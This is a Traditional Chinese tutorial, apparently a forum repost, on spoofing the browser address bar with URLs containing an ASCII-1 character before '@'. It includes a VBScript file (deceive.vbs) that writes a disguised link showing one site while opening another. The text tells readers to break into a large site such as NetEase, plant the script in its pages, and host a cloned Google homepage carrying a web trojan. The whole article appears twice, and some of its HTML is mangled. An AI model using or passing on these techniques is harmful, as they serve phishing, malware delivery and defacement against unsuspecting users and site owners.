網頁木馬種植方案一直都存在很大的問題,當然欺騙需要技巧也需要時間,我們現在不需要那麼麻煩的欺騙,本文就是教大家利用最新瀏覽器漏洞實現域名的欺騙.....
前言
域名欺騙有多種實現方法,本文所說的是利用客戶端瀏覽器的漏洞來欺騙用戶。
多數瀏覽器都會存在這個漏洞,目前暫時還沒相應的補丁。漏洞是這樣的:
當用戶通過瀏覽器訪問一個url,如果這個url是經過以下的格式構造的,那麼瀏覽器實際將訪問經過構造的惡意頁面,而用戶瀏覽器的地址欄裡所顯示的將是虛假的url:
url的構造格式為:
_1][special_char]@[url_2]/" target=_blank>http://[url_1][special_char]@[url_2]
說明: :
url_1為用戶所看到的地址,地址中不可以帶"/"
special_char為一個特殊的字符,即ascii碼為1的字符
url_2為惡意頁面地址
利用過程
首先請看這個測試頁面:
<html>
<head>
<title>域名欺騙技術實例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看這兩個鏈接有什麼區別:<br>
<h1>鏈接1:<script language="vbscript" src="deceive.vbs"></script></h1>
<h1>鏈接2:<a href="_blank ?>www.163.com" target="_blank"http://www.163.com/"; target="_blank"http://ww ... ";>www.163.com</a></h1>
</body>
</html>
這個網頁源代碼,其中鏈接1指向了一個vbs腳本,而鏈接2指向的是163站點。如果我們把連接一的vbs腳本改成下列代碼:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下請根據實際情況自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?>http://";&url1&dn&""""
mouseout="onmouseout=""javascript :window.status=''"""
click="onclick=""javascript :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag ="<span "&style&" "&mouseover&" "&mouseout&" "&click&"><font color=""#0000ff""><u>"&text&"</u></font></span>"
document.write tag
'說明:
'url1是用來欺騙用戶的地址.
'url2是實際訪問的地址,可以是網頁木馬、惡意網頁等.
'text是鏈接的文字.
'注意:(以上欺騙地址及實際地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
現在大家看到了吧~~當我們點擊這個測試頁面的時候,鏈接1指向的是google.com,而且狀態欄和地址欄裡都顯示"_blankhttp://www.163.com/",鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。
我們可以想像,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網頁木馬,那就......
不過,一個普通的個人網站沒人會看的,這就需要我們把這種假鏈接添加到別的大網站的頁面之中。假設我們入侵了一個比較大的網站,比如網易(哇~~~~~~這時候一隻菜鳥推著一車磚頭,看著我......)。這時候就可以把它的頁面給改了。
比如有一個文字鏈接,我們就可以把代碼中的"<a href="xxxxx.htm">xxxxxx</a>"改為我們自己的代碼:"<script language="vbscript" src="deceive.vbs"></script>"。看到src屬性裡的deceive.vbs了嗎?我們要編輯好這個文件,然後上傳到要修改的頁面目錄下。
這樣還不行,我們還要把自己的木馬網頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網頁,並且我們的木馬網頁裡的所有鏈接等內容要和原來的頁面一樣,否則就會引起用戶的懷疑。現在,我們把google網站的首頁源代碼全部複製下來,添加到我們的網頁木馬。把複製下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否則網頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因為用戶打開的是你的站點,而你的站點中並沒有logo.gif。都修改好後就可以保存文件了。上傳到你的網頁空間裡。
資料來源 http://bbs.tech.ccidnet.com/read.php?tid=579877
前言
域名欺騙有多種實現方法,本文所說的是利用客戶端瀏覽器的漏洞來欺騙用戶。
多數瀏覽器都會存在這個漏洞,目前暫時還沒相應的補丁。漏洞是這樣的:
當用戶通過瀏覽器訪問一個url,如果這個url是經過以下的格式構造的,那麼瀏覽器實際將訪問經過構造的惡意頁面,而用戶瀏覽器的地址欄裡所顯示的將是虛假的url:
url的構造格式為:
_1][special_char]@[url_2]/" target=_blank>http://[url_1][special_char]@[url_2]
說明: :
url_1為用戶所看到的地址,地址中不可以帶"/"
special_char為一個特殊的字符,即ascii碼為1的字符
url_2為惡意頁面地址
利用過程
首先請看這個測試頁面:
<html>
<head>
<title>域名欺騙技術實例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看這兩個鏈接有什麼區別:<br>
<h1>鏈接1:<script language="vbscript" src="deceive.vbs"></script></h1>
<h1>鏈接2:<a href="_blank ?>www.163.com" target="_blank"http://www.163.com/"; target="_blank"http://ww ... ";>www.163.com</a></h1>
</body>
</html>
這個網頁源代碼,其中鏈接1指向了一個vbs腳本,而鏈接2指向的是163站點。如果我們把連接一的vbs腳本改成下列代碼:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下請根據實際情況自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?>http://";&url1&dn&""""
mouseout="onmouseout=""javascript :window.status=''"""
click="onclick=""javascript :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag ="<span "&style&" "&mouseover&" "&mouseout&" "&click&"><font color=""#0000ff""><u>"&text&"</u></font></span>"
document.write tag
'說明:
'url1是用來欺騙用戶的地址.
'url2是實際訪問的地址,可以是網頁木馬、惡意網頁等.
'text是鏈接的文字.
'注意:(以上欺騙地址及實際地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
現在大家看到了吧~~當我們點擊這個測試頁面的時候,鏈接1指向的是google.com,而且狀態欄和地址欄裡都顯示"_blankhttp://www.163.com/",鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。
我們可以想像,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網頁木馬,那就......
不過,一個普通的個人網站沒人會看的,這就需要我們把這種假鏈接添加到別的大網站的頁面之中。假設我們入侵了一個比較大的網站,比如網易(哇~~~~~~這時候一隻菜鳥推著一車磚頭,看著我......)。這時候就可以把它的頁面給改了。
比如有一個文字鏈接,我們就可以把代碼中的"<a href="xxxxx.htm">xxxxxx</a>"改為我們自己的代碼:"<script language="vbscript" src="deceive.vbs"></script>"。看到src屬性裡的deceive.vbs了嗎?我們要編輯好這個文件,然後上傳到要修改的頁面目錄下。
這樣還不行,我們還要把自己的木馬網頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網頁,並且我們的木馬網頁裡的所有鏈接等內容要和原來的頁面一樣,否則就會引起用戶的懷疑。現在,我們把google網站的首頁源代碼全部複製下來,添加到我們的網頁木馬。把複製下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否則網頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因為用戶打開的是你的站點,而你的站點中並沒有logo.gif。都修改好後就可以保存文件了。上傳到你的網頁空間裡。
資料來源 http://bbs.tech.ccidnet.com/read.php?tid=579877
全站熱搜
留言列表